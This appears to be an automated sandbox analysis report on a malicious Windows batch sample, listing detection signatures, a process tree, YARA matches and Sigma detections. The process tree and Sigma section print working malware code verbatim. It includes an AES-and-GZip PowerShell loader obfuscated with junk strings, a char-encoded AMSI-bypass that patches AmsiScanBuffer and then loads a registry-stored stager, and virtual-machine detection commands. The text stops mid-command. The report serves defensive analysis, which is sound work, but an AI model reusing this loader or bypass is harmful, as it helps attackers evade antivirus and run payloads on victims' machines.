Edit tour

Windows Analysis Report
1.cmd

Overview

General Information

Sample name:	1.cmd
Analysis ID:	1525473
MD5:	19fc666f7494d78a55d6b50a0252c214
SHA1:	8876cd520507cbfdc2e89e449baba52232a1df1b
SHA256:	e96f8f61e3af77c429ae6af54c128f7b8420a45a0a63bdfcacd682773b8e5fc1
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

.NET source code contains process injector

.NET source code references suspicious native API functions

AI detected suspicious sample

Contains functionality to compare user and computer (likely to detect sandboxes)

Contains functionality to inject code into remote processes

Creates a thread in another existing process (thread injection)

Creates an autostart registry key pointing to binary in C:\Windows

Creates autostart registry keys with suspicious names

Creates autostart registry keys with suspicious values (likely registry only malware)

Found suspicious powershell code related to unpacking or dynamic code loading

Hides that the sample has been downloaded from the Internet (zone.identifier)

Hides threads from debuggers

Hooks files or directories query functions (used to hide files and directories)

Hooks processes query functions (used to hide processes)

Hooks registry keys query functions (used to hide registry keys)

Injects a PE file into a foreign processes

Injects code into the Windows Explorer (explorer.exe)

Installs a global keyboard hook

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Obfuscated command line found

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Sets debug register (to hijack the execution of another thread)

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: Potential PowerShell Command Line Obfuscation

Sigma detected: Potential WinAPI Calls Via CommandLine

Sigma detected: Potentially Suspicious PowerShell Child Processes

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: Powerup Write Hijack DLL

Suspicious command line found

Suspicious powershell command line found

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Deletes files inside the Windows folder

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (may stop execution after accessing registry keys)

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Powershell Execute Batch Script

Sigma detected: Suspicious Powershell In Registry Run Keys

Sigma detected: Uncommon Svchost Parent Process

Stores large binary data to the registry

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara signature match

Classification

Process Tree

System is w10x64

cmd.exe (PID: 6332 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 2120 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

findstr.exe (PID: 5924 cmdline: findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)

WMIC.exe (PID: 5968 cmdline: wmic diskdrive get Manufacturer,Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

findstr.exe (PID: 3808 cmdline: findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)

cmd.exe (PID: 2596 cmdline: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\1.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 1284 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)

WerFault.exe (PID: 732 cmdline: C:\Windows\system32\WerFault.exe -u -p 1284 -s 2444 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

cmd.exe (PID: 2088 cmdline: "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6008 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 5216 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 1712 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 4192 cmdline: wmic diskdrive get Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

findstr.exe (PID: 4336 cmdline: findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)

WMIC.exe (PID: 6808 cmdline: wmic diskdrive get Manufacturer,Model MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

findstr.exe (PID: 6856 cmdline: findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)

cmd.exe (PID: 4284 cmdline: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 4828 cmdline: powershell.exe -WindowStyle Hidden MD5: 04029E121A0CFA5991749937DD22A1D9)

WerFault.exe (PID: 412 cmdline: C:\Windows\system32\WerFault.exe -u -p 4828 -s 2096 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

WerFault.exe (PID: 3904 cmdline: C:\Windows\system32\WerFault.exe -u -p 4828 -s 2380 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

schtasks.exe (PID: 4556 cmdline: "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 3760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2852 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 3732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 3804 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

powershell.exe (PID: 6048 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:aMvXsEUhmbVC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UiLoiJoMlvXjKf,[Parameter(Position=1)][Type]$QyDJYvedMn)$NMMWPnXAdvF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+'m'+[Char](111)+''+[Char](114)+''+'y'+''+[Char](77)+''+'o'+''+[Char](100)+'u'+[Char](108)+'e',$False).DefineType('M'+[Char](121)+'D'+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+'y'+[Char](112)+'e',''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](80)+'ub'+'l'+'i'+[Char](99)+','+[Char](83)+''+[Char](101)+'a'+'l'+''+[Char](101)+'d'+[Char](44)+'An'+[Char](115)+'iCla'+'s'+''+[Char](115)+','+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+'l'+'as'+[Char](115)+'',[MulticastDelegate]);$NMMWPnXAdvF.DefineConstructor('R'+[Char](84)+'S'+'p'+''+'e'+''+'c'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+'a'+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+'Si'+'g'+','+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+'c',[Reflection.CallingConventions]::Standard,$UiLoiJoMlvXjKf).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+','+'M'+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$NMMWPnXAdvF.DefineMethod(''+'I'+''+[Char](110)+'v'+'o'+''+[Char](107)+'e',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+'H'+'i'+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+'Slo'+'t'+','+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+'l',$QyDJYvedMn,$UiLoiJoMlvXjKf).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $NMMWPnXAdvF.CreateType();}$SWnYXVUkgpflw=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+'t'+'e'+''+[Char](109)+''+'.'+'d'+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+'t.'+[Char](87)+'i'+'n'+''+'3'+''+[Char](50)+'.'+'U'+'n'+[Char](115)+''+[Char](97)+''+'f'+''+'e'+''+[Char](78)+''+'a'+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+'o'+[Char](100)+'s');$AmujSZCroNXavL=$SWnYXVUkgpflw.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+'o'+''+[Char](99)+''+[Char](65)+''+'d'+'dr'+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+'b'+[Char](108)+'i'+[Char](99)+','+[Char](83)+''+[Char](116)+'a'+[Char](116)+''+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$crUBwWNbWsKMjsxdFIT=aMvXsEUhmbVC @([String])([IntPtr]);$CpOqYoEODudajRwpdwKjEO=aMvXsEUhmbVC @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$xRGvgkyzmYH=$SWnYXVUkgpflw.GetMethod(''+[Char](71)+''+[Char](101)+'t'+'M'+''+[Char](111)+''+[Char](100)+''+'u'+''+'l'+'e'+[Char](72)+''+'a'+'nd'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+''+'r'+''+[Char](110)+''+'e'+''+[Char](108)+'3'+[Char](50)+''+'.'+''+'d'+''+[Char](108)+'l')));$PWtaGkrbiCHSQK=$AmujSZCroNXavL.Invoke($Null,@([Object]$xRGvgkyzmYH,[Object](''+'L'+''+'o'+''+[Char](97)+'d'+'L'+'ib'+[Char](114)+''+'a'+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$wJqytHrusrDKQVuUA=$AmujSZCroNXavL.Invoke($Null,@([Object]$xRGvgkyzmYH,[Object](''+[Char](86)+''+[Char](105)+''+'r'+''+'t'+'u'+[Char](97)+''+[Char](108)+'P'+'r'+''+[Char](111)+''+'t'+'e'+[Char](99)+''+[Char](116)+'')));$CBvLQPx=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PWtaGkrbiCHSQK,$crUBwWNbWsKMjsxdFIT).Invoke(''+'a'+''+[Char](109)+''+'s'+''+[Char](105)+'.'+'d'+''+[Char](108)+''+[Char](108)+'');$SjReXwPFwLrQCguSY=$AmujSZCroNXavL.Invoke($Null,@([Object]$CBvLQPx,[Object](''+[Char](65)+''+'m'+''+[Char](115)+''+'i'+'Sc'+'a'+'nB'+[Char](117)+'f'+'f'+''+[Char](101)+''+'r'+'')));$GtTUGmXcNy=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wJqytHrusrDKQVuUA,$CpOqYoEODudajRwpdwKjEO).Invoke($SjReXwPFwLrQCguSY,[uint32]8,4,[ref]$GtTUGmXcNy);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$SjReXwPFwLrQCguSY,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wJqytHrusrDKQVuUA,$CpOqYoEODudajRwpdwKjEO).Invoke($SjReXwPFwLrQCguSY,[uint32]8,0x20,[ref]$GtTUGmXcNy);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+'FT'+'W'+''+'A'+''+'R'+''+[Char](69)+'').GetValue(''+'$'+''+[Char](114)+''+[Char](98)+''+[Char](120)+''+[Char](45)+''+'s'+'t'+'a'+'g'+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

dllhost.exe (PID: 2844 cmdline: C:\Windows\System32\dllhost.exe /Processid:{3837e362-e74e-494b-bcc5-affaf78d43c0} MD5: 08EB78E5BE019DF044C26B14703BD1FA)

winlogon.exe (PID: 552 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)

lsass.exe (PID: 628 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)

svchost.exe (PID: 920 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

dwm.exe (PID: 988 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)

svchost.exe (PID: 364 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 356 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

WMIADAP.exe (PID: 5500 cmdline: wmiadap.exe /F /T /R MD5: 1BFFABBD200C850E6346820E92B915DC)

svchost.exe (PID: 696 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 592 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1044 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1084 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1200 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1252 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1296 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1316 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1408 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1488 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1496 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1552 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 1572 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

Conhost.exe (PID: 7340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 7980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: powershell.exe PID: 1284	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x2e561a:$b2: ::FromBase64String( 0x2e5678:$b2: ::FromBase64String( 0x35e0c7:$b2: ::FromBase64String( 0x35f549:$b2: ::FromBase64String( 0x379fe1:$b2: ::FromBase64String( 0x37a03f:$b2: ::FromBase64String( 0x37aad2:$b2: ::FromBase64String( 0x37ab30:$b2: ::FromBase64String( 0x4048b9:$b2: ::FromBase64String( 0x404917:$b2: ::FromBase64String( 0x2de4f2:$s1: -join 0x46128e:$s1: -join 0x46bc12:$s1: -join 0x4784b7:$s1: -join 0x48558c:$s1: -join 0x48895e:$s1: -join 0x489010:$s1: -join 0x48ab01:$s1: -join 0x48cd07:$s1: -join 0x48d52e:$s1: -join 0x48dd9e:$s1: -join
Process Memory Space: powershell.exe PID: 4828	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0xf9c2:$b2: ::FromBase64String( 0xfa20:$b2: ::FromBase64String( 0x5d86d:$b2: ::FromBase64String( 0x835c3:$b2: ::FromBase64String( 0xcf15e:$b2: ::FromBase64String( 0xcf1bc:$b2: ::FromBase64String( 0x8bc3:$s1: -join 0x955f1:$s1: -join 0x97888:$s1: -join 0x1eef:$s3: Reverse 0xd5b5a:$s3: Reverse 0x35f8:$s4: += 0x369a:$s4: += 0x6de2:$s4: += 0x8898:$s4: += 0x8aae:$s4: += 0x8ba5:$s4: += 0x91858:$s4: += 0x91877:$s4: += 0x918b2:$s4: += 0x918cf:$s4: +=

Sigma Signatures

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', 